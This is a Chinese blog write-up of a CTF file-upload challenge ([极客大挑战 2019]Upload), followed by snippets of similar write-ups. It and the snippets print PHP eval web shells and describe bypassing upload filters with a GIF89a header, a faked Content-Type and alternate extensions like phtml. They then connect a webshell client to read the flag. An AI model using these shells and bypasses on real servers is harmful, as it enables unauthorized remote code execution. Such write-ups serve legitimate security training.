[极客大挑战 2019]Upload

最新推荐文章于 2023-01-05 15:13:39 发布
最新推荐文章于 2023-01-05 15:13:39 发布
阅读量662 收藏 2
点赞数 4
分类专栏: 文件上传 js GIF89a
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41628669/article/details/106059918
版权
文件上传 同时被 3 个专栏收录
3 篇文章 0 订阅
订阅专栏
js
1 篇文章 0 订阅
订阅专栏
GIF89a
1 篇文章 0 订阅
订阅专栏

知识点

  • js绕过
  • GIF89a文件头

编写一句话木马上传

<?php 
@eval($_POST[cmd]);
?>

发现php被过滤
使用js脚本绕过

<script language = 'php'>@eval($_POST[cmd]);</script>

发现需要图片
在这里插入图片描述
使用文件头绕过
在这里插入图片描述
更改后缀名,多次尝试,发现phtml未被过滤

php别名
php3,php4,php5,pht,phtml,phps

上传成功
在这里插入图片描述
菜刀连接upload/c2.phtml,在根目录下找到flag

「已注销」
关注
专栏目录
[极客挑战 2019]Upload 1(文件上传)
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
极客挑战 2019 Upload 1
qq_52715164的博客
04-20 2533
还是文件上传得题,上传有一句话木马写的且改后缀为jpg得文件,会出现提示说文件包含`<?传不了,所以修改木马为: GIF89a? <script language="php">eval($_REQUEST[123])</script> 打开burp,抓包修改文件后缀, 发现php上传不了, 常规文件后缀为: php2, php3, php4, php5, phps, pht, phtm, phtml 这里修改后缀为:phtml可正常上传 但上传后没有返回图片保存地址,一般上
[极客挑战 2019]Upload 1
chbeloved的博客
07-21 725
[极客挑战 2019]Upload 1 上传类题目,先上传一个一句话木马再说。 把文件后缀改成jpg php就用到了<? 那就改用script写 再用jpg上传 这都被看出来了,说明对文件内容检查,那就在文件内加个JPG89a (图片头文件欺骗) 但是不成功… 有点不死心,改成GIF89a 居然过了 说明是绕过了 接下来抓包,把jpg文件修改成phtml文件发挥作用 改第一处黄色标记那后缀phtml。然后点击go 上传成功了,访问试试。 看这结尾,一般都是upload/文件名 看来是
【BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1108
Upload=> 文件上传漏洞。
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 894
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
极客挑战2019-upload
m0_73303597的博客
12-11 366
自用
web-[极客挑战 2019]Upload
wojiushilsy的博客
05-16 348
题目要点题目内容解题 题目要点 Content-Type绕过 文件头绕过 后缀名绕过 题目内容 解题 蚁剑连接
Web-[极客挑战 2019] Upload1
汗的博客
05-21 1110
文章目录[极客挑战 2019]Upload1 [极客挑战 2019]Upload1 shell名she.phtml 内容 GIF98a <script language="php">eval($_POST['cmd']);</script> burp抓包Content-Type: image/jpeg 在upload/目录下,访问页面,蚁剑连接,cat /flag ...
Buuctf<极客挑战2019upload
m0_64444909的博客
04-07 5249
文章目录一.划重点的知识点二.解题步骤二、使用步骤1.引入库2.读入数据总结 一.划重点的知识点 GIF89a图片头文件欺骗: 一个GIF89a图形文件就是一个根据图形交换格式进行格式化之后的图形。用记事本编写一下内容,然后修改后缀变成图片 GIF89a <head> <meta http-equiv = "refresh" content = "1; url=http://www.***.com/" /> </head> 当单独查看此文件时,会出现G
极客挑战 2019]EasySQL
最新发布
09-03
EasySQL 是极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值